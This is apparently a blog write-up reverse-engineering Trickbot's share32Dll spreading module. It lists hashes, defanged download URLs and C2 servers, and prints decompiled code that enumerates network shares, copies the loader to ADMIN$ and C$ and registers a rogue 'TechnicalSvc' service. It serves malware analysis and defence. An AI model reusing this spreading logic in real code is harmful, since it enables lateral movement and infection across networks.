Goal: Reverse the latest Trickbot’s module called “shareDll32” used for malware spreading in network shares. It is meant for effective operation in tandem with its worm32Dll module.
Source:
- share32Dll (encoded) (6392917a209ad5879f27d38f1fef295d9f5c3c42)
- share32Dll (decoded) (85cbf2118fa61b25b8e22f5ea9fa270f4d1643ee)
- Trickbot loader (4457952ab8bcc1f0ede8f49d013d059db5262dee)
- share32Dll (URL) hxxp://duhasti8[.]beget[.]tech/toler[.]png
- worm32Dll (URL) hxxp://duhasti8[.]beget[.]tech/worming[.]png
Background
While analyzing one of the latest Trickbot group tag “mac1/tot1/tt0002” email spam campaign (subject: “Copy of Invoice – {rand}”) (thanks to @dvk01uk) identified a newly deployed “share32Dll” module.
The decoded module contains four usual Trickbot exported functions:
Start
Control
FreeBuffer
Release
The observed Trickbot main config module was as follows (version 1000053):
<mcconf>
<ver>1000053</ver>
<gtag>tt0002</gtag>
<servs>
<srv>91.83.88[.]51:449</srv>
<srv>188.137.122[.]105:449</srv>
<srv>188.137.122[.]5:449</srv>
<srv>187.248.44[.]85:449</srv>
<srv>187.248.44[.]84:449</srv>
<srv>194.87.99[.]117:443</srv>
<srv>195.133.145[.]222:443</srv>
<srv>185.99.2[.]78:443</srv>
<srv>88.150.197[.]173:443</srv>
<srv>195.133.144[.]27:443</srv>
<srv>194.87.99[.]225:443</srv>
<srv>185.99.2[.]79:443</srv>
<srv>62.141.34[.]242:443</srv>
<srv>194.87.93[.]97:443</srv>
<srv>5.133.179[.]236:443</srv>
<srv>185.212.128[.]91:443</srv>
<srv>91.211.246[.]131:443</srv>
<srv>185.99.2[.]100:443</srv>
<srv>95.46.45[.]164:443</srv>
<srv>185.212.128[.]90:443</srv>
<srv>107.167.24[.]135:443</srv>
<srv>194.87.92[.]223:443</srv>
<srv>194.87.238[.]225:443</srv>
<srv>178.156.202[.]74:443</srv>
<srv>178.156.202[.]117:443</srv>
<srv>93.171.216[.]33:443</srv>
<srv>93.171.217[.]7:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo" />
<module name="injectDll" />
</autorun>
</mcconf> </autorun>
</mcconf>
Summary
share32Dll, compiled via 'GCC: (Rev1, Built by MSYS2 project) 6.3.0,' allows Trickbot operators to spread in network shares and establishes persistency via registering services leveraging common Windows API calls. This module appears to be meant to be used in tandem with the worm32Dll module to spread Trickbot across local networks and shares via ETERNALBLUE SMB exploit and LDAP queries.
The observed methods in the share32Dll module are as follows:
I. Download Trickbot loader copy from the payload URL
“hxxp://duhasti8[.]beget[.]tech/toler[.]png” and save it locally as “setup.exe"leveraging WINHTTP.dll API calls with the so-called “WormShare” function, named by the Trickbot operators.
The following API calls are used:
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WinHttpCloseHandle
II. Enumerate local network resources using Mpr DLL API calls in combination with GetComputerNameW for possible username directories shares:WNetOpenEnumW* (WORD dwScope = '2u')*
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW*
WNetAddConnection2W
*The parameter '2u' ensures all connections in the network are in scope.
v16 = WNetOpenEnumW(2u, 0, 0, a1, &hEnum);,
if ( !v16 )
{
v1 = GetProcessHeap();
Dst = HeapAlloc(v1, 8u, dwBytes);
if ( Dst )
{
do
{
memset(Dst, 0, dwBytes);
v15 = WNetEnumResourceW(hEnum, &cCount, Dst, &dwBytes);
if ( v15 )
{
if ( v15 != 259 )
break;
}
else
{
while ( v23 < cCount )
{
if ( *((_DWORD *)Dst + 8 * v23 + 2) == 2 )
{
nSize = 15;
Str1 = 92;
v7 = 92;
if ( GetComputerNameW((LPWSTR)&v8, &nSize) == 0 )
goto LABEL_15;
if ( wcscmp(&Str1, *((const wchar_t **)Dst + 8 * v23 + 5)) != 0 )
{
memset(&NetResource, 0, 0x20u);
wsprintfW(&v5, "%", *((_DWORD *)Dst + 8 * v23 + 5));
NetResource.lpRemoteName = &v5;
v16 = WNetAddConnection2W(&NetResource, 0, 0, 0);
if ( !v16 )
{
service_create(*((LPCWSTR *)Dst + 8 * v23 + 5));
WNetCancelConnection2W(NetResource.lpRemoteName, 0, 0);
}
}
}
if ( *((_DWORD *)Dst + 8 * v23 + 3) & 2 )
service_create1((LPNETRESOURCEW)Dst + v23);
++v23;
}
}
}
while ( v15 != 259 );
}
}
LABEL_15:
if ( hEnum )
WNetCloseEnum(hEnum);
III. Copies itself to the previously mapped network shares ADMIN$ and C$ as “techsvc[.]exe” and creates a rogue service “TechnicalSvc” using OpenSCManagerW, CreateServiceW, & StartServiceW API calls in the following location:
- %SystemDrive%\techsvc[.]exe
- %SystemRoot%\system32\techsvc[.]exe
Template module configuration in XML format is as follows:
<moduleconfig>
<autostart>yes</autostart>
<needinfo name="id"/>
<needinfo name="ip"/>
</moduleconfig>
Article Link: http://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html